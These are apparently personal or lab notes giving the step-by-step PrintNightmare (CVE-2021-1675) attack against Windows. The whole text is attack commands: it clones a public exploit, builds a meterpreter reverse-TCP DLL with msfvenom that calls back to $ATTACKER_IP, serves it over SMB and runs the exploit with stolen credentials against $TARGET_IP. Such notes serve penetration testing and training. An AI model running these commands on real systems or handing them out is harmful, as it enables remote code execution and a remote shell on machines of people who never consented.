548 B
548 B
Print Nightmare
-
Clone cube0x0's exploits
-
Create virtual env inside cloned repo and install impacket
pip install .
pip2 install .
- Create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
-
Prepare msf multi handler
-
Inside virtualenv
smbserver share $(pwd) -smb2support
- Roll the exploit
python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'